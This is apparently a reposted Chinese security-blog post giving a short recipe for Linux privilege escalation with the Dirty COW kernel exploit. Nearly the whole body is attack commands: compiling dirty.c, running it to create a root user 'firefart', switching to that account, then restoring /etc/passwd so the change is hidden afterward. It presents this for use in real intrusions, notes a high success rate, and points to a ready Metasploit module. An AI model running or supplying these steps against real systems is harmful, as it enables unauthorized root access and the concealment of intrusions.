linux溢出提权小记-linux溢出提权小记-华盟网

linux溢出提权小记

华盟学院山东省第二期线下学习计划

1、'脏牛'[Dirty copy-on-write] 提权小记:

2、实际渗透中,提的成功率相对来讲还是蛮高的,屡试不爽,废话不多说,祝大家好运吧,至于漏洞细节,请自行参考公告,影响内核版本  Dirty COW.c  2.6.22 < 3.9 

3、$ gcc -pthread dirty.c -o dirty -lcrypt

4、$ ./dirty admin

5、$ su firefart

6、# mv /tmp/passwd.bak /etc/passwd 干完活,一定要记得把东西还原回来,exp已经有相应的msf模块可用,大家请自行尝试

7、# exit

linux溢出提权小记

小结:

另外还有一些比较经典的linux提权exp,后期有空会慢慢推上来



文章出处:klion's blog

原文链接:https://klionsec.github.io/2017/04/22/dirty/

www.idc126.com

始发于微信公众号: 黑白之道

本文由 华盟网 作者:karl456789 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
0

发表评论